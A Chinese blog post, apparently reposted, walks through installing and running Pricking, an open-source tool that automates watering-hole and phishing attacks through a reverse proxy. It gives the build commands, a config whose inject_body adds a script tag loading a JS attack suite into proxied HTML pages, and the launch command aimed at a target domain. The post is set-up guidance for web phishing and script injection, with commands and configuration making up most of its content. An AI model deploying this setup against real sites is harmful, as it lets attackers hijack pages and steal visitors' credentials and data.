基于反向代理技术进行水坑攻击- Pricking项目使用介绍
2021-12-24 00:37:56 Author: payloads.online(查看原文) 阅读量:34 收藏

0x00 安装项目

Pricking 是一个自动化部署水坑和网页钓鱼的开源项目,本文介绍Pricking 项目的安装与使用。

$ git clone https://github.com/Rvn0xsy/Pricking
$ cd Pricking
$ make

0x01 例子演示

环境:

  • 反向代理服务器:MacOS 64Bit 192.168.117.1
  • 目标域名:https://payloads.online

配置文件:

filter_type:
  - "text/html" # 仅针对网页内容进行注入
exclude_file:   # 静态文件的数据包不进行注入
  - ".jpg"
  - ".css"
  - ".png"
  - ".js"
  - ".ico"
  - ".svg"
  - ".gif"
  - ".jpeg"
  - ".woff"
  - ".tff"
static_dir: "./static" # Pricking Suite 目录
pricking_prefix_url: "/pricking_static_files" # 静态目录名,不能与目标网站冲突
listen_address: "192.168.117.1:9999" # 监听地址:端口
inject_body: "<script src='/pricking_static_files/static.js' type='module'></script>" # 注入代码

Pricking是支持HTTPS反向代理的,我的博客刚好是HTTPS加密的,所以能把HTTPS转换为HTTP。

启动Pricking,确保配置文件、Static在当前目录

$ ./pricking -url https://payloads.online
2021/12/24 14:03:33 Loading config  ./config.yaml

代理效果:

查看页面底部:

代码已经成功注入,static.js中的代码就是用于引用Pricking Js Suite的内容进行加载执行。


文章来源: https://payloads.online/archivers/2021-02-18/1/
如有侵权请联系:admin#unsafe.sh